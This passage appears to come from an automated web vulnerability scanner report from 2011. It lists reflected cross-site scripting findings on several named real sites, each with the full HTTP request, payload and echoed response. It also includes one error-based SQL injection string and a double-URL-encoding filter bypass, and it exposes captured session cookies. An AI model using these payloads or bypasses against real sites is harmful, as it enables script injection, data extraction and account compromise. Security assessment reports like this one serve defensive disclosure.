Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<script>alert(1)</script>cd0802b0b7c|372 -- -->
...[SNIP]...

6.31. http://learn.shavlik.com/shavlik/index.cfm [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Issue detail

The value of the m request parameter is copied into the HTML document as plain text between tags. The payload 29f68<img%20src%3da%20onerror%3dalert(1)>8c4ff1d7709 was submitted in the m parameter. This input was echoed as 29f68<img src=a onerror=alert(1)>8c4ff1d7709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))29f68<img%20src%3da%20onerror%3dalert(1)>8c4ff1d7709&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '29f68<img src=a onerror=alert(1)>8c4ff1d7709 AND DMMESSAGE.userCompanyID = 21
' at line 7
</font>
...[SNIP]...

6.32. http://mbox5.offermatica.com/m2/netsuite/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mbox5.offermatica.com
Path:	/m2/netsuite/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 7a431<script>alert(1)</script>ce4081a25f0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1303736347554-914602&mboxPC=1303736347554-914602.17&mboxPage=1303742451474-635361&mboxCount=1&mbox=overall_conversion_tracking-mbox7a431<script>alert(1)</script>ce4081a25f0&mboxId=0&mboxURL=http%3A//www.netsuite.com/portal/page_not_found.shtml&mboxReferrer=http%3A//www.netsuite.com/pages/portal/page_not_found.jspinternal%3DT&mboxVersion=28 HTTP/1.1
Host: mbox5.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 146
Date: Mon, 25 Apr 2011 15:18:18 GMT
Server: Test & Target

mboxFactoryDefault.get('overall_conversion_tracking-mbox7a431<script>alert(1)</script>ce4081a25f0',0).setOffer(new mboxOfferDefault()).activate();

6.33. http://mbox9e.offermatica.com/m2/eset/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mbox9e.offermatica.com
Path:	/m2/eset/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 221f6<script>alert(1)</script>458371fa13e was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303736347554-914602&mboxPage=1303736347554-914602&mboxCount=1&mbox=mbx_store_con221f6<script>alert(1)</script>458371fa13e&mboxId=0&mboxTime=1303718347701&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fstore&mboxReferrer=http%3A%2F%2Fwww.eset.com%2Fus%2Fbusiness%2Fproducts&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 209
Date: Mon, 25 Apr 2011 13:00:35 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_store_con221f6<script>alert(1)</script>458371fa13e',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303736347554-914602.17");

6.34. http://ok.mail.ru/cookie-token.do [client_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ok.mail.ru
Path:	/cookie-token.do

Issue detail

The value of the client_id request parameter is copied into the HTML document as plain text between tags. The payload fa439<script>alert(1)</script>b93be018b2a was submitted in the client_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookie-token.do?client_id=247552fa439<script>alert(1)</script>b93be018b2a&remove=true HTTP/1.1
Host: ok.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=CBEE3BB859A85F56E2B5BB4ED4C1D0AC; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 243
Date: Mon, 25 Apr 2011 14:35:03 GMT
Connection: close

<html>

<head>
</head>
<body>
Failed to convert value of type [java.lang.String] to required type [long]; nested exception is java.lang.NumberFormatException: For input string: "247552fa439<script>alert(1)</script>b93be018b2a"
</body>
...[SNIP]...

6.35. http://ok.mail.ru/cookie-token.do [remove parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ok.mail.ru
Path:	/cookie-token.do

Issue detail

The value of the remove request parameter is copied into the HTML document as plain text between tags. The payload 39088<script>alert(1)</script>7c14da063e7 was submitted in the remove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookie-token.do?client_id=247552&remove=true39088<script>alert(1)</script>7c14da063e7 HTTP/1.1
Host: ok.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=A90368686F081A1B6C976FE1037576C9; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 251
Date: Mon, 25 Apr 2011 14:35:13 GMT
Connection: close

<html>

<head>
</head>
<body>
Failed to convert value of type [java.lang.String] to required type [boolean]; nested exception is java.lang.IllegalArgumentException: Invalid boolean value [true39088<script>alert(1)</script>7c14da063e7]
</body>
...[SNIP]...

6.36. http://pixel.fetchback.com/serve/fb/pdc [name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload d41e8<x%20style%3dx%3aexpression(alert(1))>15991bc29e6 was submitted in the name parameter. This input was echoed as d41e8<x style=x:expression(alert(1))>15991bc29e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landingd41e8<x%20style%3dx%3aexpression(alert(1))>15991bc29e6&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303696672_1660:517000; uid=1_1303696672_1303179323923:6792170478871670; kwd=1_1303696672; sit=1_1303696672_2451:5100:0_3236:163063:162945_782:517349:517000; cre=1_1303696672; bpd=1_1303696672; apd=1_1303696672; scg=1_1303696672; ppd=1_1303696672; afl=1_1303696672

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cmp=1_1303744450_1660:564778; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: uid=1_1303744450_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: kwd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: sit=1_1303744450_2451:52878:47778_3236:210841:210723_782:565127:564778; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: cre=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: bpd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: apd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: scg=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: ppd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: afl=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 15:14:10 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

6.37. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [height parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/dynamic_preroll_playlist.fmil

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload ac54b<script>alert(1)</script>be10ff58fe0 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=480&height=360ac54b<script>alert(1)</script>be10ff58fe0&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:19 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA34AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:54:19 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21626
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_JmFVc7buonLLfA; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:54:19 GMT; Path=/
Content-Type: application/smil
Content-Length: 3140
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="480" height="360ac54b<script>alert(1)</script>be10ff58fe0" background-color="black" />
...[SNIP]...

6.38. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/dynamic_preroll_playlist.fmil

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload 8df88<script>alert(1)</script>a5595a30893 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=4808df88<script>alert(1)</script>a5595a30893&height=360&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:09 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA34AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:54:09 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21628
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_0ZcJJ0MjgsoTEf; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:54:09 GMT; Path=/
Content-Type: application/smil
Content-Length: 3140
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="4808df88<script>alert(1)</script>a5595a30893" height="360" background-color="black" />
...[SNIP]...

6.39. http://playaudiomessage.com/play.asp [f parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://playaudiomessage.com
Path:	/play.asp

Issue detail

The value of the f request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6753b"><script>alert(1)</script>01ca021f355 was submitted in the f parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /play.asp?m=535240&f=ESQGHH6753b"><script>alert(1)</script>01ca021f355&ps=13&c=FFFFFF&pm=2&h=25 HTTP/1.1
Host: playaudiomessage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 25 Apr 2011 19:54:35 GMT
ServerID: 52
P3P: "CP=\"IDC CSP DOR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\""
Content-Length: 1121
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASCRBCAQ=DIKOABGBKGEKNEJLMDIIOOBO; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">

<title>InstantAudioPlayer</title>

...[SNIP]...
<PARAM name="movie" value="http://click-here-to-listen.com/players/iaPlay13.swf?x=2108535240ESQGHH6753b"><script>alert(1)</script>01ca021f355">
...[SNIP]...

6.40. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.trust-guard.com
Path:	/ResetPassword.php

Issue detail

The value of the txtEmail request parameter is copied into the HTML document as plain text between tags. The payload b5145<script>alert(1)</script>f50696de753 was submitted in the txtEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /ResetPassword.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
Origin: https://secure.trust-guard.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.7.10.1303748966; PHPSESSID=rphnh41r6qngg9nd1ml443go23
Content-Length: 112

txtEmail=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x0000CB%29%3C%2Fscript%3Eb5145<script>alert(1)</script>f50696de753&btnSubmit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:42:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3991
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
</script>b5145<script>alert(1)</script>f50696de753.</span>
...[SNIP]...

6.41. http://shopping.netsuite.com/s.nl [alias parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The value of the alias request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 44891'style%3d'x%3aexpression(alert(1))'9a7dd871708 was submitted in the alias parameter. This input was echoed as 44891'style='x:expression(alert(1))'9a7dd871708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /s.nl?alias=44891'style%3d'x%3aexpression(alert(1))'9a7dd871708&c=438708&n=1&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:15:54 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 233571352:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 55003

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<input type='hidden' name='referer' value='http://shopping.netsuite.com/44891'style='x:expression(alert(1))'9a7dd871708?whence=&c=438708&n=1'>
...[SNIP]...

6.42. http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d64d'style%3d'x%3aexpression(alert(1))'889d2fade51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d64d'style='x:expression(alert(1))'889d2fade51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /s.nl?alias=&c=438708&n=1&whence=&4d64d'style%3d'x%3aexpression(alert(1))'889d2fade51=1 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:36:23 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2009315293:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54826

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<input type='hidden' name='referer' value='http://shopping.netsuite.com/?whence=&4d64d'style='x:expression(alert(1))'889d2fade51=1&c=438708&n=1'>
...[SNIP]...

6.43. http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6483e'style='x:expression(alert(1))'be136aaa48c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

